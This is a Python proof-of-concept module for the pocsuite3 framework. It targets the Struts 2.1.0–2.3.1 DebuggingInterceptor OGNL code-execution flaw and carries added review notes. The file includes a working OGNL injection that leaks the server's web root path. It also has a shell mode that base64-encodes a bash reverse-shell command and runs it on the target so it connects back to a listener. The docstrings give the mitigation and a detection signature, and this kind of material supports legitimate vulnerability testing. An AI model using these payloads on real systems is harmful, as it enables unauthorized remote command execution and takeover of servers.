"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

For more information, please visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from urllib.parse import quote
from requests.exceptions import ReadTimeout
import re
import base64
# NOTE(review): logger, random_str, quote and ReadTimeout are imported but never
# used in this file. In particular, both requests.get() calls below pass no
# timeout, so an unresponsive target can stall the scan indefinitely.


class DemoPOC(POCBase):
    """pocsuite3 check for the Struts 2 DebuggingInterceptor code-execution issue.

    Every request goes to ``self.url`` with a ``debug=command&expression=<OGNL>``
    query string, i.e. the Struts 2 debugging interceptor. Per ``desc`` the
    interceptor is only reachable when the application is deployed in
    development mode, so keeping development mode off in production is the
    mitigation; that parameter pair in an access log is the detection
    signature for this check.
    """
    vulID = '0917'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2012-01-08'
    createDate = '2013-03-26'
    updateDate = '2013-03-26'
    references = ['http://www.exploit-db.com/exploits/18329/']
    name = 'Struts 2.3.1 DebuggingInterceptor 命令执行漏洞'
    appPowerLink = 'http://struts.apache.org/'
    appName = 'struts'
    appVersion = '2.3.1#'
    vulType = 'Code Execution'
    desc = '''struts2(2.1.0 - 2.3.1)应用中配置不当时(以开发模式部署)有代码执行漏洞,攻击者可利用这个漏洞方便地部署webshell'''
    samples = []
    install_requires = ['']

    def _verify(self) -> Output:
        """Verify by asking the debugging interceptor to echo the web root path.

        The OGNL expression makes the server write the absolute path of the
        application root (``getRealPath("/")``) into the response, bracketed by
        the markers ``~~not_exist_in_html~~`` and ``~3.1415621~``. If a
        marker-wrapped Windows (``c:\\...``) or Unix (``/...``) path is found
        in the response body, the target is reported as vulnerable.

        Returns:
            Output: success with ``VerifyInfo`` (``URL``, ``Path``) when the
            marker-wrapped path is found, otherwise fail.
        """
        result = {}
        # Fetch the absolute path of the web root through the debugging interceptor.
        req_confirm = "debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=false,%23req%3D%40org.apache.struts2.ServletActionContext@getRequest%28%29,%23rep%3D%40org.apache.struts2.ServletActionContext@getResponse%28%29,%23rep.getWriter%28%29.println%28new%20java.lang.StringBuilder%28%22~~not_exist_in_html~~%22%29.append%28%23req.getRealPath%28%22%2F%22%29%29.append%28%22~3.1415621~%22%29.toString%28%29%29,%23rep.getWriter%28%29.flush()"
        url_request = self.url + "?" + req_confirm
        # NOTE(review): no timeout is passed; ReadTimeout is imported but not handled here.
        r = requests.get(url_request)
        page_content = r.text
        # The drive-letter class [c-nC-n] is as authored: only c..n Windows drives match.
        match = re.findall(r'''~~not_exist_in_html~~([c-nC-n]:\\.*?|/\w*?/.*?)~3.1415621''', page_content)
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url_request
            result['VerifyInfo']['Path'] = match[0]
        return self.parse_output(result)

    def parse_output(self, result: dict[str, dict[str, str]]) -> Output:
        """Wrap *result* in an Output: a non-empty dict is success, an empty one is fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self) -> Output:
        """Attack mode does nothing beyond re-running the verify check."""
        return self._verify()

    def _shell(self) -> None:
        """Shell mode: submit a reverse-shell command to the pocsuite3 listener
        through the same debugging interceptor.

        The command is built from ``REVERSE_PAYLOAD.BASH`` with the listener
        address, base64-wrapped, and sent in the ``expression`` parameter. The
        HTTP response is discarded, so success is only observable at the
        listener.
        """
        cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
        # base64-wrap the command; presumably to keep the query string free of
        # characters that would otherwise need URL quoting — confirm.
        cmd = base64.b64encode(cmd.encode())
        # The SHELL placeholder is replaced by the base64 text of the command.
        shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}".replace("SHELL", cmd.decode())
        exec_payload = "debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29)"
        exec_payload = exec_payload.format(cmd=shell)
        url_request = self.url + "?" + exec_payload
        # NOTE(review): no timeout, and the response (including any error) is not inspected.
        requests.get(url_request)


# Register the class with the pocsuite3 framework.
register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案